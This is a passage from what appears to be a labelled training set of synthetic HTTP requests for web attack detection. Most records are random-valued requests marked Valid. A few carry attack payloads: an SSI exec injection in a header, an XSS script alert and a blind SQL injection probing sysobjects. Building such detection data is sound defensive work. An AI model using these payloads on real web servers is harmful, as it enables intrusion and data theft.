Cookie: Setawttdshhnl=lILlogjdolib;BOm_bAPwy=1;ezaLowiI6yrr=rYtvarda8Hv3;ieo1nwilO=4;ihfnsir=e;rnbg5tch=d1ty16GaPgc
Cookie2: $Version="98"
Date: Thu, 22 Apr 04 07:20:38 GMT
ETag: "VYFgtJPYIIZY_vX8QD"
Expect: tds0so5
From: ilotit@a0vnis.fr
If-Modified-Since: Wed, 26 Oct 05 16:02:54 GMT
If-Unmodified-Since: Tue, 30 May 06 22:47:14 UTC
If-Match: "eR2g_WOhw3Z@pe-@0"
If-None-Match: *
If-Range: "vAd3r3sb9.Aa7Lr1oA"
Max-Forwards: 161
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: Basic dHRlazpqZUVocg==
Authorization: ocni egNmqa=nsmntpd
Range: 429206-7,67-5603
Referer: /seagS/yslsor.tar.gz
TE: chunked
Trailer: Accept-Language
User-Agent: Mozilla/7.6 (Windows; U; Win 9x 1.1; Lw-fe; rv:0.0.1) Gecko/26345203
UA-CPU: 68000
UA-Disp: 881,593,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 9755x916
Via: 7.9 190.196.13.226:4333
Transfer-Encoding: n1reke; eugE2=u3dGz
Upgrade: I4m9/3.2, eTss/9.1
Warning: 416 www.geeewv.png:396 "qliehpR7srsnhchrotf" 
X-Forwarded-For: 59.255.139.123
X-Serial-Number: 09282554265324
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19792
Start - Id: 21223
class: Valid
GET /eAottcteeqhmhu/tYX8@NsW@/a2BVbooahXR0wCO_g5/iDe10VA/npmGosUqddeI19auD.aspx? HTTP/1.1
Host: www.i3tbiL3g.de
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.2, x-mac-ce;q=0.3
Accept-Encoding: 
Accept-Language: tdhye-fir8, vaw-j;q=0.9, hqde-sfis
Cache-Control: no-cache
Client-ip: 104.11.104.204
Cookie: Sbin2z3=am&t
Cookie2: $Version="685"
Date: Wed, 16 May 07 10:15:34 CET
ETag: W/"kqJjpAKtUco__bP"
Expect: oacsrwlt=iun1ao
From: vEvaeak@i1auid.st
If-Modified-Since: Wed, 04 Aug 04 04:55:24 UTC
If-Unmodified-Since: Tue, 29 Jul 08 11:30:29 GMT
If-Match: *
If-None-Match: "ge3IF_rt54C1WlziC"
If-Range: Tue, 14 Dec 04 14:42:36 UTC
Max-Forwards: 6955
MIME-Version: 6.1
Pragma: sZhrI='6'
Proxy-Authorization: NTLM bG50cnNtemhjbWlPdGRlM2tWY3BlcmNDNmlpb2JneWlyd2FleFRTb2ZpaWhoag==
Authorization: Digest nc=0fb7AfdE
Range: 514-56,34-,2775-22974
Referer: http://rrT5dDAi.st/onoa6sm/taOru.msf
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/3.3 (compatible; Konqueror/1.8; Mac OS X; mnoEneCt)
UA-CPU: Sparc
UA-Disp: 158,905,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7822x0790
Via: 8.4 22.10.252.10
Transfer-Encoding: identity
Upgrade: paa/5.3, a9Au/8.0
Warning: 474 205.133.110.111 "znelncj" "Mon, 25 Jan 10 21:18:40 UTC"
X-Forwarded-For: 235.168.20.114
X-Serial-Number: 51497571
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21223
Start - Id: 2656
class: Valid
GET /hc/aon/ta/bq5KwA/dicl6QInOTEQP_/iK52HXA/yrealUtddtmwah/S.j-bE/sm/Ryimg.swf?nph-4r4@Ow8=idDb4VFS&5redet=arlsilt&wu=ejDX&ulehllQrp=fepdntentbhit&htaeht=92086655&tTcetmp7xshutdown.A=6768598&a3CH=75&htls=aw%40X&XtiScdiv_4=r-l2tc%25st&Etee=rrt&otheE8=+e%3Ahtm&aadfto=ue5rmtqato8sy HTTP/1.1
Host: www.11sojsocoa.it
Connection: o0tex
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: min-fresh=46003
Client-ip: 221.99.3.21
Cookie: Sulgeaesr=719791;doaoA=l8letallr  1(;J-KuzDW@=369590
Cookie2: $Version="1"
Date: Sun, 14 Jun 09 24:23:34 UTC
ETag: "S3xPaPK3W_0T2EyCNJF-"
Expect: hvth
From: utaldrtg@eo3ke.be
If-Modified-Since: Mon, 08 Sep 08 16:57:41 GMT
If-Unmodified-Since: Tue, 06 Feb 07 12:43:48 GMT
If-Match: *
If-None-Match: *
If-Range: "r1@vx.IchxYcCS9CE"
Max-Forwards: 5
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: ieeKc mr8th98=ngl6J8
Range: 78017-732
Referer: /sxrbdhoi/7nrmr.bin
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/1.5 (compatible; MSIE 7.4; Open BSD i386; wArohe; ybncn8; Aoruishoe)
UA-CPU: x86
UA-Disp: 5435,722,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 834x080
Via: 4.0 www.tuta.html
Transfer-Encoding: gzip
Upgrade: YMots/9.9, 2loo/9.6, cgTcde/7.3, ltne1/8.2, mro0ot/2.9
Warning: 692 www.6ine.png "xa9d" "Fri, 03 Apr 09 06:38:55 UTC"
X-Forwarded-For: 196.188.242.124
X-Serial-Number: 8136074594585
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2656
Start - Id: 32759
class: Valid
POST /werlg1orushca/ejBDtF.html? HTTP/1.1
Content-Length: 279
Content-Language: Ovtics
Content-Encoding: identity
Content-Location: http://www.fHkliirh.org/nv1s.dll
Content-MD5: NXh6dDBtcGVzMWZjb3Njcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 19 Apr 09 16:48:29 CET
Last-Modified: Wed, 17 Jun 09 14:10:49 CET
Host: www.aneg.de:80
Connection: 3npoxfx
Accept: */*
Accept-Charset: euc-cn;q=0.9, euc-jp, euc-jp;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 192.207.1.50
Cookie: GRTbx7=ih;Od0seR=dsri;;aoadheurei= ocdN;QPjnb=hdenihsNcrnro5uMNO
Cookie2: $Version="4"
Date: Thu, 03 Mar 05 19:34:09 UTC
ETag: "wWcS@SmMVyQC9ds8o"
Expect: 100-continue
From: eadg@itnjs.uk
If-Modified-Since: Thu, 14 Apr 05 07:49:07 UTC
If-Unmodified-Since: Mon, 09 Feb 04 09:47:38 GMT
If-Match: *
If-None-Match: "kTO2SHU.eB_NEw8"
If-Range: Mon, 31 May 04 16:04:22 GMT
Max-Forwards: 9
MIME-Version: 9.2
Pragma: ea='amfrl'
Proxy-Authorization: Digest response="810252cB7DBdEdc5Ced1969c56D3733D"
Authorization: Basic bmFhdU1tZjU6cmVlYW5vc2g=
Range: 7780-1621,55-
Referer: http://h5oert.net/srhtatdd/epinaTbo/ncli/vgwhagh.php3
TE: chunked;q=0.4
Trailer: If-Modified-Since
User-Agent: mzwo (aKf-zFy9cE; iA4oOZ9x; wVS8GCZ6L)
UA-CPU: x86
UA-Disp: 2397,8345,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1032x4856
Via: egsea/7.2 202.84.23.234, HTTP/8.4 252.116.162.153:05451
Transfer-Encoding: dltet; Isa893X=btliaam
Upgrade: ven/0.4
Warning: 309 2.67.53.162:35 "k3rxAc0rieoX" 
X-Forwarded-For: 140.43.85.187
X-Serial-Number: 59787959
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

seiyfrsoRbRO=r;zrf9wiio&470execIboot.iniAq=bl8&hsii=k&prmarnitBaos3=d2&ccAht0tcoliiO1=opo3EbV7&9mzaDd=R0A1oecbvbscripts&eaoNhG=tsdivcaecaeesJ ome&kpia6njreuncbmt=58&2sihi0efet=UT m=>oah7at &rJxkh7shutdownWNl-=czmew2onAohNeohhE9&h7nrdfe0ml2edn=tMQSmx79XvJ&nnecocOfefeet=6291

End - Id: 32759
Start - Id: 2803
class: Valid
GET /ybZuys4Kpqv6RB0T2M5/mahf9p7szteiApifo/Tn3o5Prcuobod/h5nue.jpg?uo6cdLanMlphbl=usu+q&8btao=%26%3Cxterm&egeulaeeueuo=dotri1retfsdtyifbO&cHotiyU3=Ehatmp+%7Estdin%5D9formir&aNnsndomFiesn=%3Cuxhttpnuihe%25A&8s72r=y.IJhj_T1Z&-AC5wHjWcO54=riHAceAtT&toe=7ehnieaeaM HTTP/1.0
Host: 207.4.155.30
Connection: yitiok
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ayr-sLtaa;q=0.0, hhmeiyIh-NnteaIjE, ske-8nn;q=0.8, xnw-pierezb
Cache-Control: no-cache
Client-ip: 196.47.7.205
Cookie: ANdWfT=afdx4zn;atthroeatbi=Elformdrr;5eed=iep;fyiclzrt=0720236147;seyqA=lma
Cookie2: $Version="88"
Date: Wed, 19 Mar 08 04:22:59 UTC
ETag: W/"C.XYpDgjnCdms.vN"
Expect: 100-continue
From: arssA4ca@gl7rLYaldc.uk
If-Modified-Since: Mon, 13 Apr 09 09:40:20 GMT
If-Unmodified-Since: Sat, 01 May 10 24:11:51 GMT
If-Match: *
If-None-Match: *
If-Range: "20gmx5AMja@teIViw4E"
Max-Forwards: 7398
MIME-Version: 5.1
Pragma: 6quvs='r'
Proxy-Authorization: Basic b3J4dDp0NWozaFBz
Authorization: uats ocna=resae
Range: 653260-,8-79,061108-10
Referer: /ysguot/hlrSch.mpeg
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/0.9 (compatible; MSIE 3.9; Open BSD i586; tn1Djn)
UA-CPU: Sparc
UA-Disp: 604,2690,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 620x373
Via: 5.3 www.mhocA.jpg, 4.1 www.ceaoi.js:6644, 6.0 www.iiosAnv.htm
Transfer-Encoding: identity
Upgrade: Sbhjos/1.1
Warning: 126 www.incHlted.shtml "Oeitaulhesy" 
X-Forwarded-For: 213.3.252.110
X-Serial-Number: 82627
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2803
Start - Id: 11166
class: Valid
GET /b_I/tvbUI/jaqreO8hmnopnql/3n5Admzvz@iJU7y5/upaqmeczegr/eKhP/3DBzV.z/eV-YofzaML/r7Kko6_RyXggxx2Vu-R/slY/plOjK_2PyK7sJIaa.cgi?sconnectYjhavingHAf=ee&lzAayihhegu=qO.&5Er=xw7nhurwsSf7p&D1od=9&errOnqt0nh=icopyesd&eebzyamdsiij=7524&ra=030323547&5eTonf=42363 HTTP/1.0
Host: 246.92.248.77:63958
Connection: lZno
Accept: video/*;q=0.0, image/jpeg;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: gzip
Accept-Language: s8-ot, srAr-ea;q=0.3, ijc4h-p
Cache-Control: nrHm=oOnnAl
Client-ip: 86.6.116.71
Cookie: Zt8a=as>replaceUp[tsnrp>I;nsW8hruwayxae=7;1yuirlheaO=5132438
Cookie2: $Version="468"
Date: Fri, 05 Dec 08 13:56:58 GMT
ETag: W/"tz3FUytBgdLCr0Y1G"
Expect: seenYno=cada
From: daneee@lheneowi.org
If-Modified-Since: Tue, 16 Aug 05 07:09:07 CET
If-Unmodified-Since: Sun, 20 Dec 09 15:25:29 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 20 Apr 05 18:58:51 CET
Max-Forwards: 6145
MIME-Version: 3.8
Pragma: 0s7='r'
Proxy-Authorization: Digest response="FF6f55D1baDeb6c2C872bb57B9eB0aDd"
Authorization: NTLM bm90cnJkNmlzcmVocmFvYm5ob3lydG9zbHpzbmlhcmVl
Range: 01809-,9808-,-723
Referer: http://www.vuehl.de/isaeexaT/ogie.htm
TE: trailers,gzip,trailers
Trailer: Warning
User-Agent: ta7dw39 http://www.nzpaf7.it
UA-CPU: StrongARM
UA-Disp: 5419,0442,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 571x624
Via: 0.9 182.83.198.176
Transfer-Encoding: gzip
Upgrade: sma/1.3, wob8L/8.0, olat/7.1, duc/0.2
Warning: 587 29.152.16.59 "sKvi" "Sat, 16 Jul 05 05:54:58 CET"
X-Forwarded-For: 199.166.24.178
X-Serial-Number: 98553683859236748
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11166
Start - Id: 30175
class: Valid
GET /ash/FaKGZ8IWb9ZH/hK7sDDgy/iht/0PwCa-Y4/gKm8v@52idF__FT/nrocKzo/hhtsceeSdoh7jt/f@6/ncosc4OXM9OVUPR5Q.css?ghetaerne=nygXDL-afY&oveh5dtnmpr081=osthoilboesdewtso&otltfenil92laa=Hui&btcexe=met2livyFTo&xrm6u=35897419&xlot5=scBjqnAfE&23imslieljkdnr=insnihmgjhsIntreej&dlSd=ld7etgec0ashutdowne&Ss6nrsMmht=ib+2&hsmiTkwr3smarma=+spositiontl&autEe=6&vpi=9 HTTP/1.0
Host: www.ui9adn.ch:80
Connection: keep-alive
Accept: image/*, image/png;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: eser-A6, hdsGtp-cslow;q=0.0, rao-n
Cache-Control: max-age=8069
Client-ip: 193.181.58.13
Cookie: faarualH1vdt=shtGbtrrmochaaesstbv;9MMWBtincludeki=ttonnbk
Cookie2: $Version="3"
Date: Wed, 04 Apr 07 12:29:13 UTC
ETag: W/"jjm@N-l1CcVk.VXsfi"
Expect: Ggag
From: n30oip@sye2lHtos.gov
If-Modified-Since: Tue, 21 Oct 08 16:51:45 UTC
If-Unmodified-Since: Fri, 24 Nov 06 21:55:48 GMT
If-Match: *
If-None-Match: "wCV3lrmngQrNoKbwF"
If-Range: Fri, 10 Jun 05 10:33:52 CET
Max-Forwards: 1071
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: aGeo uhioari5=RFiho
Authorization: NTLM a2dpdGhycGx0b3RzeGVlbnNyYTdyOHJzcnRwNWVpdGFhQ2FhaXI=
Range: 77-,-72,-70
Referer: http://xneiih.com/cAgani/faeh.html
TE: chunked;q=0.9,trailers
Trailer: Upgrade
User-Agent: Mozilla/6.7 (Windows; U; WinNT 6.5; tI-ak; rv:1.0.0) Gecko/50863882
UA-CPU: Sparc
UA-Disp: 133,828,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 488x0113
Via: 7.6 www.sagrS.png, 8.9 www.R5icA.jpeg
Transfer-Encoding: deflate
Upgrade: delna/9.9, tta/9.0
Warning: 337 145.226.205.116 "slrtoretepnre" 
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 5387143927109477044
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30175
Start - Id: 5270
class: Valid
PUT /6kcQtKwwZhDsWFKB2N/ndurneetna9/ttB.JM/yiZ/Kh/whrt/ttt/aiM2EjSm5ng2ZCL2/eaQwALBCTRtg/na.cfm? HTTP/1.0
Content-Length: 210
Content-Language: f3,srvuCn
Content-Encoding: deflate
Content-Location: http://AodM.com/e9Hsh/fiao/rnd2a.jsp
Content-MD5: YW1pYWJndGtvdXBobDBicw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 03 Nov 05 10:37:12 CET
Last-Modified: Mon, 26 Feb 07 19:59:15 GMT
Host: 213.18.57.138:80
Connection: Rr1uhynE
Accept: */*;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 17.116.214.161
Cookie: eoroVIaciteaa=atonhEts Enph-u\a;9FCqhtacces=ttoope)4l ;ui=85844
Cookie2: $Version="2"
Date: Sat, 01 Aug 09 24:01:29 GMT
ETag: W/"Mej5kgQmiW7JuL0Ca"
Expect: 100-continue
From: anun@nmcev.org
If-Modified-Since: Mon, 06 Aug 07 24:23:30 CET
If-Unmodified-Since: Fri, 02 May 08 02:25:40 UTC
If-Match: *
If-None-Match: "@gfzwEvpEGZ9@CGc2"
If-Range: "K.wnRA0C-MnhbGW"
Max-Forwards: 2
MIME-Version: 9.4
Pragma: o9fo=g2C
Proxy-Authorization: Basic c2FpaGE6aWRvdWJu
Authorization: t5uHj aehc=a9snsd
Range: -400
Referer: http://www.eestmli.fr/retsg/mDlgo/oriuciq.pl
TE: chunked
Trailer: Trailer
User-Agent: Mozilla/0.0 (X11; U; Open BSD i386 0.7; cc-ec; rv:1.7.3) Gecko/31856685
UA-CPU: x86
UA-Disp: 507,781,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 4414x768
Via: FTP/4.1 211.170.142.18, eo5/7.4 133.89.246.187, HTTP/9.9 www.ttkbmt.jpg
Transfer-Encoding: erfzh
Upgrade: ils/2.7, sefi/2.9, rbjh/3.8, 6ir/1.4
Warning: 731 183.237.250.141:0 "tuteLitohsstoT" 
X-Forwarded-For: 101.23.25.216
X-Serial-Number: 76349451666157165
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

eiuapwrigkl=8701157&UhaetRmeiaer3fs=teort&esrsooyssa8oaT9='kprocessing-instructionaA&9ahinoahllruphx=child&d1iecdthgngc=edRMu8riOd3wue&ttdsIsrbhio=0823531&Os2J@-U=54&fcir3tenNbm=OYhhi &sdjoua=465&i1pa2oEntp=9

End - Id: 5270
Start - Id: 18539
class: Valid
GET /o.x@_7Kg.asmx?1agroT1tnukyno=2aura0o&egxcqcGDA=z&sdluailetcnaa=879 HTTP/1.1
Host: 111.171.228.172:80
Connection: nebbsc
Accept: text/*, application/*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.3
Cache-Control: max-stale=7
Client-ip: 26.16.70.98
Cookie: 7xgcb=rlhN2passwdgriN3i;O-TaQ_NAC=89561;ioEurzlaShIewih=?
Cookie2: $Version="81"
Date: Wed, 24 May 06 07:37:49 UTC
ETag: "Kk6.ES3XN1t4fbLXH"
Expect: 100-continue
From: x0tmarT@bobht4e.cz
If-Modified-Since: Wed, 03 Oct 07 04:35:33 CET
If-Unmodified-Since: Tue, 19 Jan 10 18:46:00 UTC
If-Match: *
If-None-Match: "mtNyy1ems-qUZ0TyKaM"
If-Range: Thu, 18 Mar 10 11:33:45 GMT
Max-Forwards: 02
MIME-Version: 6.7
Pragma: i2h=ayf6wl
Proxy-Authorization: Basic ZTByZTpzYVR1aWk=
Authorization: NTLM c3Jsb3NUMmhvb3NuZ3JhdTgxaDgwZXdpcHh0dGF1ZUFtMlJPZXQ0aHNldjBycw==
Range: 71-87326
Referer: /ikae.bin
TE: gzip;q=0.0
Trailer: Trailer
User-Agent: Mozilla/8.8 (Machintosh; U; PPC Mac OS X 0.7; ar-gr; rv:2.2.4) Gecko/67070796
UA-CPU: Sparc
UA-Disp: 973,9699,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 2222x203
Via: 0.9 www.seehlu.tiff
Transfer-Encoding: compress
Upgrade: eeyva/6.8
Warning: 418 www.f0trQd.shtml "iseqw0oHr" 
X-Forwarded-For: 81.60.123.231
X-Serial-Number: 4260259016385
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18539
Start - Id: 40214
class: SSI
PUT /aennHirpelvhneit/d55hqJJhttp@bQ/eetKmeycDn/etqk@cCSz/t4xUkrmR14H3Vxui_ZZn/1QeQ/aG4/enxhfrMY9m/n8gmal4eibwns/Mo76/zuU7C1RxC6/ehrsi.jpg? HTTP/1.0
Content-Length: 125
Content-Language: hietsrca,7ctnone
Content-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Host: 22.97.233.175
Connection: wezjh
Accept: */*;q=0.6
Accept-Charset: cp-950
Accept-Language: <!     #<!--     #exec cmd="id"-->
Cookie: sgSiejio=rrj;nset6xoageire=dTDmbt7PvGIQ
Date: Sat, 22 Dec 07 19:39:34 UTC
If-Unmodified-Since: Tue, 19 Feb 08 15:00:28 UTC
Max-Forwards: 3880
Authorization: nsde psrmi=unnta
Referer: /rtty7.nsf
TE: trailers,trailers,deflate
User-Agent: oeow9T

eo0zmoEaAR0=rl&ed=tscript&bonmN9tgot8wga=934904166&xeekaa6eba=8 pkv&a3oqjeL=<a0s &sqE=tumetp=h/qNh&YferaeeGwtuho=402361

End - Id: 40214
Start - Id: 25794
class: Valid
GET /mo/WY@ormFdIqmFLP/rmTpf2Ursrenryr.exe?d2rsresaean=sdnn&ant0oittw=%3B%3Ar+link&oLdTeitsarpe=yfC7LQG69&SuecDV=oSeaekleq HTTP/1.0
Host: www.dsiw.net
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.8
Cache-Control: min-fresh=680
Client-ip: 89.254.34.165
Cookie: ocIkYuIEaiefV=357521;Hm6=85432437;nabptf=308861;s3aawre7w7=4650547
Cookie2: $Version="81"
Date: Thu, 09 Sep 04 01:44:16 UTC
ETag: W/"5RHt55FH9QQdc7hfmap"
Expect: 9tpeowE2
From: wcr0oelc@nhee9nt.fr
If-Modified-Since: Mon, 13 Jul 09 06:08:37 UTC
If-Unmodified-Since: Sat, 21 Oct 06 20:47:17 GMT
If-Match: "htejDvvkKVFGVaViP"
If-None-Match: *
If-Range: *
Max-Forwards: 08
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM bWxvaGhtdEhmdDB3amhtZXdOc3lHbmpubmd0NGJjVDhhVHM3czRzbDAyWG0=
Authorization: NTLM c25UeFJ1Mmh3eWlpcHNjZG5zcG9vdGxudE5kYjVlaGV5ZzJlZWV1c2VVN28=
Range: 644-,-02
Referer: http://www.r9a8num.com/nlouAu.php
TE: deflate;q=0.4,chunked,deflate
Trailer: User-Agent
User-Agent: Mozilla/4.4 (Windows; U; Windows NT 7.9; no-7e; rv:9.2.7) Gecko/08896640
UA-CPU: Sparc
UA-Disp: 9911,6209,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 291x574
Via: HTTP/8.6 71.101.100.62
Transfer-Encoding: compress
Upgrade: wga/3.1, Wienee/8.7, tle/0.5, sc5O3p/8.0, atnnea/5.9
Warning: 065 www.kyttnBu.html:02 "aeyhhShlroEc" 
X-Forwarded-For: 186.228.205.221
X-Serial-Number: 63082151043081
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25794
Start - Id: 47641
class: XSS
GET /jSXSz9QZAt5y87D4UI/s-48gYHw-3iZqs5ka6/psTsrNEqKjjnrCJx0g4/eaakn/ldhXNaSK/Oeim/rHbPdQb29lzGd6OT.oci.mspx?5tmpRGCPGXU=%3Cxml+++++id+++%3D+%22+++++X++++%22+++%3E%3Ca+++%3E%3Cb+%3E%26lt%3Bscript%3E%5Balert+++%28%27Btiinn%27%29%3B%5D%26lt%3B%2Fscript++++%3E%3B%3C%2Fb++%3E%3C%2Fa%3E%3C%2Fxml+%3E&nhli0enssa3=768729964&oncrleooJudMT=hIs8mZeRSqeZ&nxlre=8&4z36ahgeeao=7&oota1atgg=p&Tr=smaccess_logtzud7lett%5C HTTP/1.0
Host: 138.178.53.252
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-cyrillic;q=0.4, windows-1253
Accept-Encoding: compress;q=0.4, deflate
Accept-Language: nalm-u, mOn-aebsuhD, sroiu-fnhfelt, aabd-aac;q=0.3, q-x3ocr
Cache-Control: no-transform
Client-ip: 61.243.9.51
Cookie: dqDusvoxtd9=dh9S.vha;ushutdownArBvsamstyle=rxdJnhayr
Cookie2: $Version="84"
Date: Sat, 20 Sep 08 15:27:14 GMT
ETag: W/"KeyKdGthDghEQTc"
Expect: 100-continue
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Fri, 25 Sep 09 06:40:03 UTC
If-Unmodified-Since: Sun, 27 Dec 09 20:48:45 UTC
If-Match: *
If-None-Match: "g0Nxp49zdnVaV17qXr1"
If-Range: Fri, 05 Jan 07 06:32:39 GMT
Max-Forwards: 6
MIME-Version: 9.3
Pragma: w2gaaB4=eJsnti
Proxy-Authorization: Digest opaque="enht"
Authorization: Basic aHJ0bmhubEk6NzJ5OQ==
Range: 51-,059585-
Referer: http://www.meda.fr/Cantt/dgofr/beaa9te/ltenRe/pdfoa.mspx
TE: trailers,deflate;q=0.3,trailers
Trailer: Accept-Encoding
User-Agent: Lied (eoZStNl5Z; aQd_X46)
UA-CPU: StrongARM
UA-Disp: 434,760,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 635x1311
Via: 7.4 www.h0Ga.gif
Transfer-Encoding: wtree; stoak=wnhf
Upgrade: 5dscf/6.1, eosne/4.5
Warning: 566 31.172.243.106 "c7nne1icSkIuSipo" "Sat, 17 Jan 04 22:31:55 GMT"
X-Forwarded-For: 253.174.138.228
X-Serial-Number: 6943669939
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47641
Start - Id: 42149
class: SqlInjection
GET /b2K93moC-ZtMk8xbVO/hnvoof/aEhzG.1plQ/ahh5d9tnyAg/9npslraiannr/utWqiRT0ryrrevkey.html?9i=ti%29oytmt&cVBOc3=485656&inhlww=AND+++++ascii%28lower%28substring%28%28SELECT++++TOP++++1+++sen9zu+FROM+sysobject+++++WHERE+++xtype++++%3D++++%27U%27+++%29%2C1%2C1%29%29%29++%3E++111&ohniiphuy9npefu=aooboot.inie-lSsa&orabeE0Ohtrffdr=6947&tereueerL=31214220&Oleq=5013292&eCotsH=t3aeelike HTTP/1.0
Host: www.RtaitcRo.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 117.221.83.105
Cookie: h5RegDhnua=o8y3lbsttgji2st~r;tun=i6s3R9L
Cookie2: $Version="903"
Date: Sun, 23 May 04 18:53:55 UTC
ETag: W/"R.zF5Up0kwBtPzZ-DN7V"
Expect: 2tic
From: yaieolw@dAieet.st
If-Modified-Since: Sun, 29 Jun 08 05:21:08 UTC
If-Unmodified-Since: Mon, 28 Aug 06 18:14:01 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 0.7
Pragma: At=Iy
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Digest realm
Range: 4781-
Referer: http://uilv0t.biz/sIaweeh/hhuT/sehet/u8nptgdo/wFd9.fgf
TE: deflate,trailers
Trailer: Authorization
User-Agent: rtsayz/5.2.6.8
UA-CPU: StrongARM
UA-Disp: 2259,521,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3499x504
Via: HTTP/7.8 203.237.173.224:14, 0.2 www.npizcqp.css:66794, FTP/9.6 www.BJdA4t.jpeg
Transfer-Encoding: gzip
Upgrade: 9lrrsw/6.5, henvno/5.4
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42149
Start - Id: 18704
class: Valid
GET /CoCqdhIoemm.tiff?aamseg=exec%3AeiKpexecn HTTP/1.1
Host: 248.237.99.232
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: iso-8859-9, iso-8859-3;q=0.5, big5, utf-7;q=0.4, x-mac-turkish;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 44.204.170.197
Cookie: EruUemBpatn=i'Oug0tgt;Fnp9oand0haa=2321322;T3odocument0in5=4798;ODuav1HK=th
Cookie2: $Version="32"
Date: Sun, 16 Oct 05 23:19:40 CET
ETag: "EY1v5K30dn1.s4fbHQaz"
Expect: hrihs=0ifud;roerun=rw4ecs
From: useStO@hehn.uk
If-Modified-Since: Sun, 02 May 04 05:09:04 GMT
If-Unmodified-Since: Sun, 12 Aug 07 23:57:12 GMT
If-Match: "UgkRaQszhpeg6MM@Lp"
If-None-Match: "CEl7SvSub3pTZA4qTh"
If-Range: "rarI-vOvVxzKFTgOQl2w"
Max-Forwards: 739
MIME-Version: 4.4
Pragma: vg=arF
Proxy-Authorization: Basic dDFzcjphcGxtb2V0ZQ==
Authorization: NTLM ZWVpamVhYWZJZWNhcmVlaGloZnRpckF2MW94cnJzc25pMW9oYm9vZHhzYXNkOGc=
Range: -0
Referer: http://iltrhln.gov/Riaaeo6l/csssyho7/iaEieun8.php3
TE: gzip;q=0.8,gzip;q=0.5
Trailer: If-Unmodified-Since
User-Agent: gDgtcemOaz/6.1
UA-CPU: MIPS
UA-Disp: 2495,184,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8595x9488
Via: FTP/7.3 204.154.218.221, HTTP/8.3 www.0ecsderi.htm
Transfer-Encoding: compress
Upgrade: aaqm/7.5, hetArn/7.5
Warning: 387 www.lc0fpmeE.tiff "bfheieso" 
X-Forwarded-For: 225.250.72.17
X-Serial-Number: 343586
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18704
Start - Id: 24620
class: Valid
GET /hlslagCys6ssE/2qtV5etcs9YoL/.QqscriptMd.mspx?rwBrapeixea=df HTTP/1.1
Host: 117.139.10.113
Connection: gmmnoaar
Accept: video/quicktime, audio/*;q=0.2
